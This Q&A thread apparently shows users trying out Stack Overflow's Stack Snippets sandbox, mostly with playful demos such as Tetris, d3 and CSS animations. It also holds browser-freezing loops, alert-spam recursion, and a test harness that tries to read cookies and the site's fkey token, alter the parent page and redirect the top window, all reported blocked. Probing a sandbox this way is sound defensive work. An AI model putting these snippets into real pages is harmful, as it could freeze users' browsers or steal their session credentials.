Comment: Awesome. This is my fave so far.

Comment: @Haney Thanks; it seemed like a good way to demonstrate the feature.

Comment: Wow, we can close a dozen questions on SO by linking to this answer ;)

Comment: "00:46:20 PM" ... I mean, yeah, maybe.

Comment: @AndrewArnold Fixed (just in time, too), but you'll have to wait another 24 hours to see it in action. Thanks.

Comment: Doesn't fit on one line in Firefox 31 on Ubuntu.

Comment: ...Adventure Time!

Comment: And here I am still hoping for a picture of Finn and Jake in the snippet output... `:(`

Comment: @dav_i When this one first popped up, I was fighting not to put that exact comment. This is a very well-written snippet, though!

Comment: @NathanOsman Fixed.

Answer (score 52):

Run the snippet to crash your browser.

```js
var s=' ';while(1)s+=' ';
```

Comment: I run it anyway and Firefox stopped responding. I closed the tab and it closed nicely. "Yeah! it didn't crash!". Than it crashed. Browsers are stupid.

Comment: Freezes the tab in Chrome

Comment: Would crash the tab in Opera

Comment: ran in firefox, 30 second wait, back to normal, I was expecting the "script is unresponsive" popup but nothing

Comment: Frozen Safari too...

Comment: wow.. ! after clicking my chrome went froze even i can't upvote the ans...

Comment: That filled my RAM with 2Go of spaces

Comment: IE10 seems to be immune, in the same way as FF.

Comment: I'm dumb. I was scrolling through to try each snippet and clicked the "run" button before reading the description.

Comment: Failed. Only laggs tab

Comment: Safari just refreshed the page :p

Answer (score 48):

Things that currently are nicely sandboxed (feel free to add things you tried that didn't work):

```js
var TESTS = {
  "Trashing the parent": function() {
    parent.document.querySelector("body").innerHTML = "Much evil!";
  },
  "Reading cookies": function() {
    var evil = document.cookie;
  },
  "Getting fkey": function() {
    var evil = parent.StackExchange.options.user.fkey;
  },
  "Listen to messages in parent": function() {
    parent.addEventListener( "message", function( m ) { console.log( m ); }, false );
  },
  "Send user to different page": function() {
    window.top.location.assign( "http://example.com" );
    throw new Error("window.top.location.assign doesn't work");
  }
};

$(function() {
  var resultTemplate = $("#resultTemplate").html();
  var pass = $("#pass"), fail = $("#fail");

  Object.keys(TESTS).forEach(function(testName) {
    var test = TESTS[testName];
    try {
      test();
      fail.append(errorTemplate(testName, test));
    } catch (e) {
      pass.append(errorTemplate(testName, test, e));
    }
  });

  function errorTemplate(name, test, error) {
    return resultTemplate.replace("{name}", name)
                         .replace("{code}", test.toString())
                         .replace("{error}", error);
  }
});
```

```css
code {
  white-space: pre-wrap;
}

#pass dt {
  color: #12AA33;
}
#pass dt::after {
  content: "✓";
  display: inline-block;
  font-size: 1.25em;
  font-weight: bold;
  margin-left: .25em;
}
#pass dt + dd { display: none; }

#fail dt {
  color: #AA1233;
}
#fail dt::after {
  content: "✘";
  display: inline-block;
  font-size: 1.25em;
  font-weight: bold;
  margin-left: .25em;
}
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<dl id="fail"></dl>
<h2>Looks like we are protected against the following:</h2>
<dl id="pass"></dl>
<script type="test/template" id="resultTemplate">
<dt>{name}</dt>
<dd>Running:
<pre><code>{code}</code></pre>
Resulted in the following:
<pre><code>{error}</code></pre></dd>
</script>
```

Comment: Is this meant to fail? "SecurityError: Blocked a frame with origin "null" from accessing a cross-origin frame."

Comment: Yes, it is meant to fail.  If either of those worked, this feature would have issues. Feel free to try other more complicated exploits - lots of stuff is closed down by the *very* nice setup (iframe in another domain, locked down so that JS doesn't even have access to cookies).

Comment: Unfortunately, I don't know any of the supported languages. Until Haskell allows this kind of programing, I'm SOL.

Comment: @Kyllopardiun - I updated the runner to show checkboxes for security tests where the browser succeeded in blocking the "attack". Security *holes* will show up in red with a full stack trace, but good security measures will show up with a green checkmark next to them.

Comment: Thanks for explaining. I thought there was some issues with firefox considering the previous comments.

Comment: [Haney's answer](https://meta.stackoverflow.com/a/269894/3357935) demonstrates that code snippets cannot log users out.

Answer (score 45):

Interesting to see how d3.js and SVG work...

I borrowed the code from a d3 tutorial to test:

http://bl.ocks.org/mbostock/1125997

---

```js
var margin = {top: 40, right: 40, bottom: 40, left: 40},
    width = 420 - margin.left - margin.right,
    height = 180 - margin.top - margin.bottom;

var y = d3.scale.ordinal()
    .domain(d3.range(25))
    .rangePoints([0, height]);

var z = d3.scale.linear()
    .domain([10, 0])
    .range(["hsl(62,100%,90%)", "hsl(228,30%,20%)"])
    .interpolate(d3.interpolateHcl);

var svg = d3.select("body").append("svg")
    .attr("width", width + margin.left + margin.right)
    .attr("height", height + margin.top + margin.bottom)
  .append("g")
    .attr("transform", "translate(" + margin.left + "," + margin.top + ")");

svg.selectAll("circle")
    .data(y.domain())
  .enter().append("circle")
    .attr("r", 12)
    .attr("cx", 0)
    .attr("cy", y)
    .style("fill", function(d) { return z(Math.abs(d % 20 - 10)); })
  .transition()
    .duration(2500)
    .delay(function(d) { return d * 40; })
    .each(slide);

function slide() {
  var circle = d3.select(this);
  (function repeat() {
    circle = circle.transition()
        .attr("cx", width)
      .transition()
        .attr("cx", 0)
        .each("end", repeat);
  })();
}
```

```css
circle {
  fill: #000;
  stroke: #000;
  stroke-width: 1.5px;
}
```

```html
<script src="https://d3js.org/d3.v3.min.js"></script>
```

Comment: This one is super cool. I love D3.

Answer (score 42):

SPAM ME ! Recurse test (Uncaught RangeError: Maximum call stack size exceeded )

NOTE: (IE 8/9 doesn't support console.log on normal window), try this with your dev tools open

**IMP: Try it an window you don't bother to lose.**

```js
function recurse(){alert('');console.log('spam me');recurse();};recurse();
```

UPDATE 1: Spam the document window (IE 8/9 doesn't support console.log on normal window)

```js
function recurse(){alert('');document.write('spam me');recurse();};recurse();
```

Comment: whoa!  Maximum call stack.  Nicely done!

Comment: Not my current Firefox (31.0) :(

Comment: IE9 seems to prevent it.

Comment: Wow, IE9 did something better than FF? I'm in shock.

Comment: This should be easy to solve. All we have to do is detect whether the code will ever terminate and... oh wait.

Comment: @DavidFullerton nice. I hadn't thought to make reference to the Halting Problem. ;)

Comment: This doesn't get blocked automatically by Chrome, but it gives you an option to "block further dialogs"

Comment: I think this gets plus points for being the first to [abuse the feature](http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here#comment84516_269754). :D:D:D

Comment: @LightnessRacesinOrbit that's very strange--I had to end my IE 11 task in Task Manager. It definitely didn't intervene. Unless there's some setting for that, but I really can't imagine there would be.

Comment: @Haney I figured it out. It looks like IE9 was better than Firefox, but they fixed that in IE11 so now it's less smart again. Phew. That was a close one.

Comment: If you block further dialogs, does it block every dialog that SO shows in that page? There are cases where SO itself (not 3rd party) shows a popup for confirmation etc.

Comment: @DavidFullerton - JS Bin does have some protection from infinite loops and bad performance in general: http://jsbin.com/blog/protection , including an open source loop protection module: https://github.com/jsbin/loop-protect . It's easy to say "halting problem" and give up, but it turns out there is a lot you can do to help your users.

Comment: @Haney: On second popup, firefox asks if I want to stop showing popups.

Comment: Safari, on iPad Air, is successfully unusable after this. >.<

Comment: In Internet Explorer 9 (and 8), the console object is only exposed when the developer tools are opened for a particular tab so that might cause the discrepancy. But FF always better :)

Comment: Maybe things like this should be hooked so they can be limited, e.g. `window.alert = alertHook` where alertHook would only show an alert up to n times.

Comment: Firefox 31.0 gives the option of blocking it as well.

Comment: Run run run run run run run away. OH OH OH Psycho Killer Qu'est-ce que c'est?

Comment: Safari 7.0.6 OS X unstoppable popups... after a while crash... 

Comment: Not that is really matters, but in Chrome (on a Mac) one can even close the tab when the first popup is shown (not having to wait for the next), by using the menus [when making sure the tab has focus instead of the popup](http://superuser.com/questions/396108/mackeeper-has-hijacked-my-safari-browser/714039#714039). @DavidT, Safari has an ancient bug report for that (10028726).

Answer (score 37):

Burnanating a greeting:

```css
body {
  background-color: #000;
  padding: 1em;
}

h1 {
    text-align: center;
    margin-top:3em;
}

span {
    color: #fff;
    font-size:1.5em;
}

.fire {
  animation: animation 1s ease-in-out infinite alternate;
  -moz-animation: animation 1s ease-in-out infinite alternate;
  -webkit-animation: animation 1s ease-in-out infinite alternate;
  -o-animation: animation 1s ease-in-out infinite alternate;
}

.burn {
  animation: animation .65s ease-in-out infinite alternate;
  -moz-animation: animation .65s ease-in-out infinite alternate;
  -webkit-animation: animation .65s ease-in-out infinite alternate;
  -o-animation: animation .65s ease-in-out infinite alternate;
}

@keyframes animation
{
0% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #feec85,
  -20px -20px 40px #ffae34,
  20px -40px 50px #ec760c,
  -20px -60px 60px #cd4606,
  0 -80px 70px #973716,
  10px -90px 80px #451b0e;}
100% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #fefcc9,
  -20px -20px 40px #feec85,
  22px -42px 60px #ffae34,
  -22px -58px 50px #ec760c,
  0 -82px 80px #cd4606,
  10px -90px 80px  #973716;}
}

@-moz-keyframes animation
{
0% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #feec85,
  -20px -20px 40px #ffae34,
  20px -40px 50px #ec760c,
  -20px -60px 60px #cd4606,
  0 -80px 70px #973716,
  10px -90px 80px #451b0e;}
100% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #fefcc9,
  -20px -20px 40px #feec85,
  22px -42px 60px #ffae34,
  -22px -58px 50px #ec760c,
  0 -82px 80px #cd4606,
  10px -90px 80px  #973716;}
}

@-webkit-keyframes animation
{
0% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #feec85,
  -20px -20px 40px #ffae34,
  20px -40px 50px #ec760c,
  -20px -60px 60px #cd4606,
  0 -80px 70px #973716,
  10px -90px 80px #451b0e;}
100% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #fefcc9,
  -20px -20px 40px #feec85,
  22px -42px 60px #ffae34,
  -22px -58px 50px #ec760c,
  0 -82px 80px #cd4606,
  10px -90px 80px  #973716;}
}

@-o-keyframes animation
{
0% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #feec85,
  -20px -20px 40px #ffae34,
  20px -40px 50px #ec760c,
  -20px -60px 60px #cd4606,
  0 -80px 70px #973716,
  10px -90px 80px #451b0e;}
100% {text-shadow: 0 0 20px #fefcc9,
  10px -10px 30px #fefcc9,
  -20px -20px 40px #feec85,
  22px -42px 60px #ffae34,
  -22px -58px 50px #ec760c,
  0 -82px 80px #cd4606,
  10px -90px 80px  #973716;}
}
```

```html
<h1>
    <span class="fire">[H</span><span class="burn">e</span><span class="fire">l</span><span class="burn">l</span><span class="fire">o</span><span class="burn">W</span><span class="fire">o</span><span class="burn">r</span><span class="fire">l</span><span class="burn">d</span><span class="fire">!]</span>
</h1>
```

Comment: Wow; this slows the page down quite a bit. I think we need a way to collapse these...

Comment: If you made it green/aqua, it'd look like the Aurora Borealis.

Comment: @AstroCB A "Hide Result" button was added at some point

Answer (score 36):

How about a simple Canvas and Google maps snippet test?

```js
var map;
function initialize() {
  var mapOptions = {
    zoom: 4,
    center: new google.maps.LatLng(37.6,-95.665)
  };
  map = new google.maps.Map(document.getElementById('map-canvas'),
                            mapOptions);
}

google.maps.event.addDomListener(window, 'load', initialize);
```

```css
html, body, #map-canvas {
            height: 100%;
            margin: 0px;
            padding: 0px
          }
```

```html
<!DOCTYPE html>
<html>    
    <head>
        <title>Simple Map</title>
        <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
        <meta charset="utf-8">
        <style>
</style>
        <script src="https://maps.googleapis.com/maps/api/js?v=3.exp"></script>
    </head>
    <div id="map-canvas"></div>
    </body>
</html>
```

Comment: This is fairly mind blowing. Damn.

Comment: I remember when Street View blew my mind. Now you can apply it as an added gimmick to a SO question. It still blows my mind though.

Comment: Oops! Something went wrong.
This page didn't load Google Maps correctly. See the JavaScript console for technical details.

Answer (score 34):

## Tetris

<kbd>Left</kbd> - move left.
<kbd>Right</kbd> - move right.
<kbd>Up</kbd> - rotate clockwise.
<kbd>Down</kbd> - accelerate.

[JSFiddle](http://jsfiddle.net/ova777/kFxja/)

```js
var fs = "1111:01|01|01|01*011|110:010|011|001*110|011:001|011|010*111|010:01|11|01:010|111:10|11|10*11|11*010|010|011:111|100:11|01|01:001|111*01|01|11:100|111:11|10|10:111|001", now = [3,0], pos = [4,0];
var gP = function(x,y) { return document.querySelector('[data-y="'+y+'"] [data-x="'+x+'"]'); };
var draw = function(ch, cls) {
    var f = fs.split('*')[now[0]].split(':')[now[1]].split('|').map(function(a){return a.split('')});
    for(var y=0; y<f.length; y++){
        for(var x=0; x<f[y].length; x++){
            if(f[y][x]=='1') {
                if(x+pos[0]+ch[0]>9||x+pos[0]+ch[0]<0||y+pos[1]+ch[1]>19||gP(x+pos[0]+ch[0],y+pos[1]+ch[1]).classList.contains('on')) return false;
                gP(x+pos[0]+ch[0], y+pos[1]+ch[1]).classList.add(cls!==undefined?cls:'now');
            }
        }
    }
    pos = [pos[0]+ch[0], pos[1]+ch[1]];
};
var deDraw = function(){ if(document.querySelectorAll('.now').length>0) deDraw(document.querySelector('.now').classList.remove('now')); };
var check = function(){
 for(var i=0; i<20; i++)
  if(document.querySelectorAll('[data-y="'+i+'"] .brick.on').length == 10) 
   return check(roll(i), document.querySelector('#result').innerHTML=Math.floor(document.querySelector('#result').innerHTML)+10);
};
var roll = function(ln){ if(false !== (document.querySelector('[data-y="'+ln+'"]').innerHTML = document.querySelector('[data-y="'+(ln-1)+'"]').innerHTML) && ln>1) roll(ln-1); };
window.addEventListener('keydown', kdf = function(e){
    if(e.keyCode==38&&false!==(now[1]=((prv=now[1])+1)%fs.split('*')[now[0]].split(':').length) && false===draw([0,0], undefined, deDraw())) draw([0,0],undefined, deDraw(), now=[now[0],prv]);
    if((e.keyCode==39||e.keyCode==37)&&false===draw([e.keyCode==39?1:-1,0],undefined,deDraw())) draw([0,0],undefined,deDraw());
    if(e.keyCode == 40)
        if(false === draw([0,1], undefined, deDraw())) {
            if(draw([0,0], 'on', deDraw())||true) check();
            if(false === draw([0,0], undefined, now = [Math.floor(Math.random()*fs.split('*').length),0], pos = [4,0])) { 
    toV=-1; 
    alert('Your score: '+document.querySelector('#result').innerHTML); 
   }
        }
});
toF = function() {
    kdf({keyCode:40});
    setTimeout(function(){if(toV>=0)toF();}, toV=toV>0?toV-0.5:toV);
};
toF(toV = 500);
```

```css
#stack {
    width: 130px;
    height: 260px;
    border: solid 1px black;
    border-top: 0px;
}

.brick {
    width: 11px;
    height: 11px;
    border: solid 1px white;
    background: white;
    float: left;
}
.brick.on {
    background: black;
}
.brick.now {
    background: green;
}
```

```html
<div class="score">score: <span id="result">0</span></div>
  
  <div id="stack">
    <div data-y="0" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="1" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="2" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="3" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="4" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="5" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="6" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="7" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="8" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="9" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="10" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="11" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="12" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="13" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="14" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="15" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="16" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="17" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="18" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
    <div data-y="19" class="line">
        <div data-x="0" class="brick"></div><div data-x="1" class="brick"></div><div data-x="2" class="brick"></div><div data-x="3" class="brick"></div><div data-x="4" class="brick"></div><div data-x="5" class="brick"></div><div data-x="6" class="brick"></div><div data-x="7" class="brick"></div><div data-x="8" class="brick"></div><div data-x="9" class="brick"></div>
    </div>
</div>
```

Comment: JavaScript in snippets get minified. Missing semicolons or accolades can break your code.

Comment: That's another half an hour I'm not getting back..

Comment: Congratulations on delaying the release of an upgraded version of Snippets by another half hour. So fun.

Comment: Hah!! Too addictive! Kill it before it lay eggs...

Answer (score 34):

## PHP Code

*(don't mind the scrollbar)*

```html
<?php                                                                                                               ?><script>
    $store = array(0, 1, 0, 1, 0, 0);                                                                               function array(){ return [].slice.apply(arguments) }var preg_replace=function(regex,w,str){var re=regex.split('/').splice(1,2);re[1]+='g';return str.replace(RegExp.apply(0,re),w)},str_split=function(s,n){var a=[],n=n||1;for(var i=0;i<s.length;i+=n)a.push(s[i]);return a;},implode=function(w,a){return a.join(w)},var_dump=function(t){document.write((typeof t=='object'?(t.length>-1?'array':'object'):typeof t)+(t.length!==void 0?'('+t.length+')':'')+' '+JSON.stringify(t).replace(/\[/,'{').replace(/\]/,'}').replace(/,([^,])/g,', $1'))},styl=document.createElement('style');styl.innerHTML='body{font-family:monospace}';document.head.appendChild(styl);
    $check = str_split(preg_replace('/10/','1',implode('',$store)));
    var_dump($check);                                                                                               </script><?php
?>
```

Comment: This blew my mind, then really pissed me off, then made me laugh. Great work.

Answer (score 32):

Some crazy CSS 3D transforms and animation. Why not?

(this is adapted from the code at http://desandro.github.io/3dtransforms/docs/cube.html)

```css
@keyframes rotate {
    from {
        transform: translateZ(-300px) translateY(0px) rotateY(0deg) rotateZ(50deg) rotateX(0deg);
    }
    50% {
        transform: translateZ(-300px) translateY(0px) rotateY(180deg) rotateZ(30deg) rotateX(100deg);
    }
    to {
        transform: translateZ(-300px) translateY(0px) rotateY(360deg) rotateZ(50deg)  rotateX(0deg);
    }
}
.container {
    width: 200px;
    height: 200px;
    position: relative;
    margin: 40px auto 0 auto;
    border: 1px solid #CCC;
    perspective: 1000px;
}
#cube {
    width: 100%;
    height: 100%;
    position: absolute;
    top: -120px;
    transform: translateZ(-100px) translateY(100px);
    transform-style: preserve-3d;
    transition: transform 1s;
    animation: rotate 2s ease-in 1s infinite;
}
#cube figure {
    display: block;
    position: absolute;
    width: 196px;
    height: 196px;
    border: 2px solid black;
    line-height: 196px;
    font-size: 120px;
    font-weight: bold;
    color: #000;
    text-align: center;
    background: rgba(255,255,255,0.5) !important;
}
#cube .front {
    background: hsla(0, 100%, 50%, 0.7);
    transform: translateZ(100px);
}
#cube .back {
    background: hsla(60, 100%, 50%, 0.7);
    transform: rotateX(-180deg) translateZ(100px);
}
#cube .right {
    background: hsla(120, 100%, 50%, 0.7);
    transform: rotateY(90deg) translateZ(100px);
}
#cube .left {
    background: hsla(180, 100%, 50%, 0.7);
    transform: rotateY(-90deg) translateZ(100px);
}
#cube .top {
    background: hsla(240, 100%, 50%, 0.7);
    transform: rotateX(90deg) translateZ(100px);
}
#cube .bottom {
    background: hsla(300, 100%, 50%, 0.7);
    transform: rotateX(-90deg) translateZ(100px);
}
```

```html
<script src="//cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>

<section class="container">
    <div id="cube" class="show-right">
        <figure class="front">⚀</figure>
        <figure class="back">⚁</figure>
        <figure class="right">⚂</figure>
        <figure class="left">⚃</figure>
        <figure class="top">⚄</figure>
        <figure class="bottom">⚅</figure>
    </div>
</section>
```

Comment: This is pretty slick!

Comment: and the unicode is still highlightable in the render!
⚀
⚁
⚂
⚃
⚄
⚅
!

Answer (score 30):

#### This should have been done way sooner.

```js
document.write('Hello World!')
```

```css
div:before {
  content: "Hello World!";
  display: block;
}
```

```html
<div>Hello World!</div>
```

Comment: WebKit is only willing to recurse 3 times.

Comment: @tbodt, why would it be recursing at all?  It's writing hello world in three different ways, one with javascript, one with html, and one with CSS on the sole element in the body tag.

Answer (score 28):

The good old `<marquee>` ;)

```html
<marquee>I am an unicorn and I eat other unicorns.</marquee>
```

Comment: Wow that still works! <nostalgia>

Comment: NOOOOOOOOOOOOOOOOOOOOOOOH!

Answer (score 24):

The Wheel of Blame!

```js
$(function () {
    $.getJSON('http://anyorigin.com/get?url=' + encodeURIComponent('http://chat.meta.stackoverflow.com/rooms/info/89/tavern-on-the-meta') + '&callback=?', function (data) {
        parser = new DOMParser();
        htmlDoc = parser.parseFromString(data.contents, "text/html");
        var a = htmlDoc.getElementsByClassName('username');
        var b = htmlDoc.getElementsByClassName('user-gravatar48');
        var c = document.getElementsByTagName('ul')[0];

        for (var i = 0; i < a.length; i++) {
            c.innerHTML = c.innerHTML + "<li><img src='" + b[i].src + "'/>It's " + a[i].innerHTML + '\'s fault!</li>';
        }
        var li = $('ul li'),
        spinBtn = $('#spin');
        for (var i = 0; i < 3; i++) {
            li.clone().appendTo('ul');
        }


        var randNum;
        function spin() {
            randNum = Math.random();
            spinBtn.attr('disabled', true).text('Hang on!');
            li.first().animate({
                marginTop: -(li.first().outerHeight(true) * (Math.floor(randNum * li.length * 2) + li.length * 2)) - 2
            }, 5000, 'easeOutQuad', function () {
                spinBtn.attr('disabled', false).text('Spin Again!');
            });
        }

        spinBtn.click(function () {
            li.first().css('margin-top', 0);
            spin();
            return false;
        });
        spin();
    });
});
```

```css
body {
    font-family: Arial, sans-serif;
    margin: 20px;
}
.clearfix {
    clear: both;
}
ul {
    float: left;
    margin-left: 20px;
    height: 24px;
    background-color: #efefef;
    padding: 10px 20px 10px 10px;
    overflow: hidden;
    -moz-border-radius: 3px;
    -webkit-border-radius: 3px;
    border-radius: 3px;
    -moz-box-shadow: 0 2px 2px rgba(0, 0, 0, 0.3);
}
ul li {
    font-size: 20px;
    margin-bottom: 30px;
}
ul li img {
    width: 24px;
    height: 24px;
    margin-right: 5px;
    vertical-align: bottom;
}
#csharp {
    display: inline-block;
    width: 24px;
    margin-right: 5px;
}
#blame {
    float: left;
    font-size: 12px;
    margin-top: 15px;
}
#spin {
    float: left;
    margin: -5px 0 0 15px;
    padding: 1px 3px 2px;
}
#sub {
    font-size: 11px;
    color: #ccc;
    clear: both;
    padding-top: 20px;
}
#sub a {
    color: #346C95;
}
#sub a:hover {
    color: #59B3EF;
}
#sub code {
    font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace;
}
#spin {
    position:absolute;
    -moz-box-shadow:inset 0px 0px 0px 0px #fce2c1;
    -webkit-box-shadow:inset 0px 0px 0px 0px #fce2c1;
    box-shadow:inset 0px 0px 0px 0px #fce2c1;
    background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ffc477), color-stop(1, #fb9e25) );
    background:-moz-linear-gradient( center top, #ffc477 5%, #fb9e25 100% );
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffc477', endColorstr='#fb9e25');
    background-color:#ffc477;
    -webkit-border-top-left-radius:42px;
    -moz-border-radius-topleft:42px;
    border-top-left-radius:42px;
    -webkit-border-top-right-radius:0px;
    -moz-border-radius-topright:0px;
    border-top-right-radius:0px;
    -webkit-border-bottom-right-radius:42px;
    -moz-border-radius-bottomright:42px;
    border-bottom-right-radius:42px;
    -webkit-border-bottom-left-radius:0px;
    -moz-border-radius-bottomleft:0px;
    border-bottom-left-radius:0px;
    text-indent:0px;
    border:1px solid #eeb44f;
    display:inline-block;
    color:#ffffff;
    font-family:Arial;
    font-size:15px;
    font-weight:bold;
    font-style:normal;
    height:65px;
    line-height:65px;
    width:131px;
    text-decoration:none;
    text-align:center;
    text-shadow:-1px -1px 0px #cc9f52;
}
#spin:active {
    background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fb9e25), color-stop(1, #ffc477) );
    background:-moz-linear-gradient( center top, #fb9e25 5%, #ffc477 100% );
}
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fb9e25', endColorstr='#ffc477');
    background-color:#fb9e25;
}.spin:active {
    position:relative;
    top:1px;
}
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script type="text/javascript" src="http://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script>
<p id="blame">The Wheel of Blame!</p>
<br class="clearfix" />
<ul>
<li><img src="https://i.stack.imgur.com/DdIcm.png" alt="" /> It's the SO Dev Team's fault!</li>
<li><span id="csharp">C#</span> It's C#'s fault!</li></ul>
<button id="spin" disabled>Loading...</button>
```

Comment: And I was just about to do this one. Also seems that it's always Tim Stone's fault, but this could be because of a blocked script on my end.

